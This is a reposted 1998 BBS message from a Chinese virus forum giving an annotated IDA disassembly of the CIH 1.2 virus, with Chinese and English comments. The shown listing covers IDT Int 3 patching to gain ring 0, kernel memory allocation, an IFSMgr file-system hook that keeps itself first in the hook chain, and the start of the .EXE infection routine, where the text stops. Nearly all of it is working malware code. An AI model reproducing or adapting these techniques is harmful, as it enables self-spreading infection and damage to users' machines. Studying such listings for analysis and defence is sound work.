发信人: TBsoft (TBsoft), 信区: Virus
标 题: 完整的代码(CIH 1.2)[转载]
发信站: 武汉白云黄鹤站 (Mon Oct 26 10:55:17 1998) , 站内信件
发信人: Nova_Zhao@bbs.ustc.edu.cn (真生命), 信区: virus
标 题: 完整的代码(CIH 1.2)
发信站: 中国科大BBS站 (Sun Oct 25 10:38:09 1998)
转信站: wuheebbs!ustcnews!ustcbbs
; | This file is generated by Interactive Disassembler (IDA)
; | Copyright (c) 1997 by DataRescue sprl,
;
Runtime Info
;ESI :00400303 新的Int 3的处理入口,
;
p386
;-----------------------------------------------------------------------
; CIH 1.2 entry stub (IDA listing of the in-file image, addresses as
; loaded). Executes in ring 3 where the infected host starts; presumably
; the host's patched entry point, the original one being 4035ABh (see
; sub_0_4002AF). It registers an SEH frame and falls into sub_0_4002AF,
; which completes that frame on the stack before touching the IDT.
;-----------------------------------------------------------------------
004002A0
004002A0
004002A0
004002A0 Seg0 segment word public 'CODE' use32
004002A0 assume cs:Seg0
004002A0 ;org 4002A0h
004002A0 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
004002A0 55 push ebp ;saved here, restored at 4002FC before control goes to the host
004002A1 8D 44 24 F8 lea eax, [esp-8] ;eax = address of the {prev, handler} record sub_0_4002AF pushes next
004002A5 33 DB xor ebx, ebx
004002A7 64 87 03 xchg eax, fs:[ebx] ;fs:[0] = that record; eax = previous fs:[0] (old SEH chain head)
004002AA E8 00 00 00 00 call $+5 ;push eip: position-independent self-location
004002AF
004002AF
004002AF
004002AF ; S u b r o u t i n e
004002AF
004002AF sub_0_4002AF proc near
004002AF 5B pop ebx
004002B0 8D 4B 42 lea ecx, [ebx+42h]
004002B3 51 push ecx
004002B4 50 push eax
004002B5 50 push eax ;这4字节作为缓冲区
004002B6 0F 01 4C 24 FE sidt qword ptr [esp-2] ;取中断描述符表寄存器(48字节
004002BB 5B pop ebx ;得到中断描述符表基址
004002BC 83 C3 1C add ebx, 1Ch ;每个描述项占8字节
004002BF FA cli ;加1C则指向Int 3的描述项
004002C0 8B 2B mov ebp, [ebx]
004002C2 66 8B 6B FC mov bp, [ebx-4] ;保存Int 3的处理入口于EBP中
004002C6 8D 71 12 lea esi, [ecx+12h] ;取新的Int 3的处理入口于ESI
004002C9 56 push esi
004002CA 66 89 73 FC mov [ebx-4], si
004002CE C1 EE 10 shr esi, 10h
004002D1 66 89 73 02 mov [ebx+2], si
004002D5 5E pop esi ;设置新的Int 3的处理入口,
004002D6 CC int 3
004002D7 56 push esi ;保存ESI
004002D8 8B F0 mov esi, eax
004002DA
004002DA loc_0_4002DA: ;传送一块病毒体到申请的线性地址?CODE XREF: sub_0_4002AF+3
9.j
004002DA 8B 48 FC mov ecx, [eax-4]
004002DD F3 A4 rep movsb ;传送完了么?
004002DF 83 E8 08 sub eax, 8
004002E2 8B 30 mov esi, [eax] ;完则跳转
004002E4 0B F6 or esi, esi ;传送完了么?
004002E6 74 02 jz short loc_0_4002EA ;完则跳转;本例中病毒体合计1003字
004002E8 EB F0 jmp short loc_0_4002DA ;否则循环
004002EA
004002EA
004002EA loc_0_4002EA: ; CODE XREF: sub_0_4002AF+37.j
004002EA 5E pop esi ;恢复ESI
004002EB CC int 3 ;安装文件监视的服务,Important,EDI = 1003
004002EC FB sti ;置回Int 3的处理入口
004002ED 33 DB xor ebx, ebx
004002EF EB 07 jmp short loc_0_4002F8
004002F1
004002F1 33 DB xor ebx, ebx
004002F3 64 8B 03 mov eax, fs:[ebx]
004002F6 8B 20 mov esp, [eax]
004002F8
004002F8 loc_0_4002F8: ; CODE XREF: sub_0_4002AF+40.j
004002F8 64 8F 03 pop dword ptr fs:[ebx] ;恢复原程序的运行
004002FB 58 pop eax
004002FC 5D pop ebp
004002FD 68 AB 35 40 00 push 4035ABh
00400302 C3 retn
00400302 sub_0_4002AF endp
00400302
;-----------------------------------------------------------------------
; Replacement Int 3 handler at 400303h, reached in ring 0 once the gate
; patch in sub_0_4002AF is in place. It dispatches on the caller's ZF
; (int 3 does not change it): ZF=0 -> allocation path, ZF=1 -> hook
; installation at loc_0_400337. DR0 serves as an "already resident"
; marker here rather than as a breakpoint register.
; On entry [esp] is the return EIP pushed by int 3; ebx = IDT gate
; pointer, ebp = original gate offset and esi = 400303h are the caller's.
; The int 20h + dword pairs are Win9x VxDCall stubs; NOTE(review): the
; read of [esi+3Dh] below assumes the VMM has rewritten the stub into a
; call through a service-table slot -- standard VxDCall behavior, confirm.
;-----------------------------------------------------------------------
00400303 74 32 jz short loc_0_400337 ;2nd entry (ZF=1): install the file-system hook
00400305 0F 21 C1 mov ecx, dr0 ;DR0 != 0 means the body is already resident (listing author: debugger check)
00400308 E3 10 jecxz short loc_0_40031A ;not resident yet: allocate
0040030A 83 04 24 15 add dword ptr [esp], 15h ;already resident: return EIP 4002D7h+15h = 4002ECh, skipping copy and 2nd int 3
0040030E
0040030E loc_0_40030E: ; CODE XREF: Seg0:00400356.j
0040030E 66 89 6B FC mov [ebx-4], bp ;put the original Int 3 gate offset back, low word
00400312 C1 ED 10 shr ebp, 10h
00400315 66 89 6B 02 mov [ebx+2], bp ;high word
00400319 CF iret
0040031A
0040031A
0040031A loc_0_40031A: ; CODE XREF: Seg0:00400308.j
0040031A 0F 23 C3 mov dr0, ebx ;mark resident (ebx = IDT gate pointer); also disturbs hardware-breakpoint debugging
0040031D 6A 0F push 0Fh ;listing author: ecx must be zero, for PG_VM
0040031F 51 push ecx ;ecx = 0 here (jecxz was taken); listing author: VM handle
00400320 6A FF push 0FFFFFFFFh ;listing author: physical address limit (comment truncated in the listing)
00400322 51 push ecx
00400323 51 push ecx
00400324 51 push ecx
00400325 6A 01 push 1
00400327 6A 02 push 2 ;listing author: PAGEUSEALIGN
00400329 CD 20 int 20h ;VxDCall with 8 dword args (see add esp, 20h): allocate a linear block
0040032B 53 db 53h
0040032C 00 db 0
0040032D 01 db 1 ;service 0053h of VxD 0001h (VMM) = _PageAllocate
0040032E 00 db 0
0040032F 83 C4 20 add esp, 20h ;drop the 8 dwords pushed above
00400332 97 xchg eax, edi ;edi = allocated linear base (returned in eax)
00400333 8D 46 9D lea eax, [esi-63h] ;eax = 4002A0h = first body chunk (esi = 400303h)
00400336 CF iret
00400337
00400337 loc_0_400337: ; CODE XREF: Seg0:00400303.j
00400337 8D 87 F7 FC FF FF lea eax, [edi-309h] ;edi = end of the copied body; -309h = the copy of the hook entry at 400382h
0040033D 50 push eax ;hook function
0040033E CD 20 int 20h ;VxDCall 0040:0067 = IFSMgr_InstallFileSystemApiHook
00400340 67 db 67h
00400341 00 db 0 ;after the VMM patches the stub, this dword is read back at 400348 as a slot pointer
00400342 40 db 40h
00400343 00 db 0
00400344
00400344 0F 23 C0 mov dr0, eax ;eax = value returned by the install call, kept in DR0
00400347 58 pop eax ;eax = hook address again
00400348 8B 4E 3D mov ecx, [esi+3Dh] ;ecx = dword at 400340h = pointer to the service's table slot (see note above)
0040034B 8B 11 mov edx, [ecx] ;edx = current InstallFileSystemApiHook service address
0040034D 89 50 FC mov [eax-4], edx ;saved at hook-4 (copy of 40037Eh), used by sub_0_40035E as call [ebx-4]
00400350 8D 40 D6 lea eax, [eax-2Ah] ;eax = copy of 400358h, the sub_0_40035E entry stub
00400353 89 01 mov [ecx], eax ;redirect the service slot: later hook installers run through the virus stub
00400355 FA cli
00400356 EB B6 jmp short loc_0_40030E ;restore the original Int 3 gate and iret
00400358
;-----------------------------------------------------------------------
; sub_0_40035E (entered at 400358h): the routine that loc_0_400337 wires
; into the IFSMgr_InstallFileSystemApiHook service slot. When another
; component installs a file-system hook, this stub removes the virus
; hook, installs the caller's hook through the real service saved at
; [ebx-4], then re-installs the virus hook so it stays first in the
; chain, and returns the caller's result. Addresses below are those of
; the listing; the resident copy runs relocated, hence the call $+5.
;-----------------------------------------------------------------------
00400358 53 push ebx
00400359 E8 00 00 00 00 call $+5 ;self-locate
0040035E
0040035E sub_0_40035E proc near
0040035E 5B pop ebx ;ebx = 40035Eh
0040035F 83 C3 24 add ebx, 24h ;ebx = 400382h = virus file-system hook entry
00400362 53 push ebx ;hook to remove
00400363 CD 20 int 20h ;VxDCall 0040:0068 = IFSMgr_RemoveFileSystemApiHook
00400365 68 db 68h
00400366 00 db 0
00400367 40 db 40h
00400368 00 db 0
00400369 58 pop eax ;drop the argument
0040036A FF 74 24 08 push dword ptr [esp+8] ;caller's hook argument ([esp] = saved ebx, [esp+4] = return address)
0040036E FF 53 FC call dword ptr [ebx-4] ;real InstallFileSystemApiHook, address stored at 40037Eh by loc_0_400337
00400371 59 pop ecx ;drop the argument
00400372 50 push eax ;keep the caller's return value
00400373 53 push ebx
00400374 FF 53 FC call dword ptr [ebx-4] ;re-install the virus hook at the head of the chain
00400377 59 pop ecx
00400378 0F 23 C0 mov dr0, eax ;DR0 = value returned by the re-install
0040037B 58 pop eax ;caller's return value
0040037C 5B pop ebx
0040037D C3 retn
;4-byte slot at 40037Eh, written by loc_0_400337 with the real service
;address; IDA decoded it as push ds + bytes, the listing itself says "may be data".
0040037E 1E push ds
0040037F 38 db 38h
00400380 02 db 2
00400381 C0 db 0C0h ;may be data
;文件监视的服务入口
00400382 60 pusha
00400383 E8 00 00 00 00 call $+5
00400388 ; ----------------------------------------------------------------------
00400388 ; S u b r o u t i n e
00400388 sub_0_400388 proc near
00400388 5E pop esi ;at run time esi = E8
00400389 81 C6 03 03 00 00 add esi, 303h ;esi = E8+0x303 = 0x3EB =1003
0040038F loc_0_40038F: ; CODE XREF: sub_0_400388+1.^
0040038F F6 06 01 test byte ptr [esi], 1
00400392 0F 85 F0 01 00 00 jnz loc_0_400588
00400398 8D 5C 24 28 lea ebx, [esp+28h]
0040039C 83 3B 24 cmp dword ptr [ebx], 24h
0040039F 0F 85 DD 01 00 00 jnz loc_0_400582
004003A5 FE 06 inc byte ptr [esi]
004003A7 83 C6 05 add esi, 5
004003AA 56 push esi
004003AB 8A 43 04 mov al, [ebx+4]
004003AE 3C FF cmp al, 0FFh
004003B0 74 08 jz short loc_0_4003BA
004003B2 04 40 add al, 40h
004003B4 B4 3A mov ah, 3Ah
004003B6 89 06 mov [esi], eax
004003B8 46 inc esi
004003B9 46 inc esi
004003BA loc_0_4003BA: ; CODE XREF: sub_0_400388+28.j
004003BA 6A 00 push 0
004003BC 6A 7F push 7Fh
004003BE 8B 5B 10 mov ebx, [ebx+10h]
004003C1 8B 43 0C mov eax, [ebx+0Ch]
004003C4 83 C0 04 add eax, 4
004003C7 50 push eax
004003C8 56 push esi
004003C9 CD 20 int 20h ;INT 20 VXDCall UniToBCSPath
004003CB 41 db 41h
004003CC 00 db 0
004003CD 40 db 40h
004003CE 00 db 0
004003CF 83 C4 10 add esp, 10h
004003D2 81 7C 06 FC 2E 45 58 45 cmp dword ptr [esi+eax-4], 4558452Eh ;判断是否